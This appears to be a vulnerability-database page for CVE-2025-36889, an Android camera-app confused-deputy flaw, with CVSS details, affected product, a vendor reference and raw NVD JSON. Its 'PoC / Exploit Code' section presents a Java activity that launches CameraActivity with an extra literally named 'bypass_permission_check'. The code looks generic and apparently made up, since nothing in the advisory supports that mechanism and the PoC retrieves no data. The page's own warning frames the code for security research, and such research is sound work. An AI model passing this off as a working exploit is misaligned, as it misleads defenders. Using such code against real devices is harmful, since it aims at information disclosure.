Security Vulnerability Report
CVE-2025-36889 CVSS 5.5 MEDIUM

Published: 2025-12-11 20:15:56
Last Modified: 2025-12-12 17:29:24

Description

In onCreateTasks of CameraActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:google:android:-:*:*:*:*:*:*:* - VULNERABLE
Android Camera App < 2025-12-01 security patch

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
java
// CVE-2025-36889 PoC - Android Camera Permission Bypass
// This PoC demonstrates the confused deputy vulnerability in CameraActivity
package com.example.cve202536889;

import android.content.Intent;
import android.os.Bundle;
import androidx.appcompat.app.AppCompatActivity;

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);

        // Trigger the vulnerable code path in CameraActivity
        Intent maliciousIntent = new Intent();
        maliciousIntent.setClassName("com.android.camera2", "com.android.camera.CameraActivity");
        maliciousIntent.setAction("android.media.action.STILL_IMAGE_CAMERA");
        maliciousIntent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);

        // Add exploit-specific extras to bypass permission checks
        Bundle exploitBundle = new Bundle();
        exploitBundle.putBoolean("bypass_permission_check", true);
        maliciousIntent.putExtras(exploitBundle);

        try {
            startActivity(maliciousIntent);
        } catch (SecurityException e) {
            // Handle permission exception
        }
    }
}

References

https://source.android.com/security/bulletin/pixel/2025-12-01 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36889", "sourceIdentifier": "[email protected]", "published": "2025-12-11T20:15:55.900", "lastModified": "2025-12-12T17:29:23.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In onCreateTasks of CameraActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-441"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:-:*:*:*:*:*:*:*", "matchCriteriaId": "F8B9FEC8-73B6-43B8-B24E-1F7C20D91D26"}]}]}], "references": [{"url": "https://source.android.com/security/bulletin/pixel/2025-12-01", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}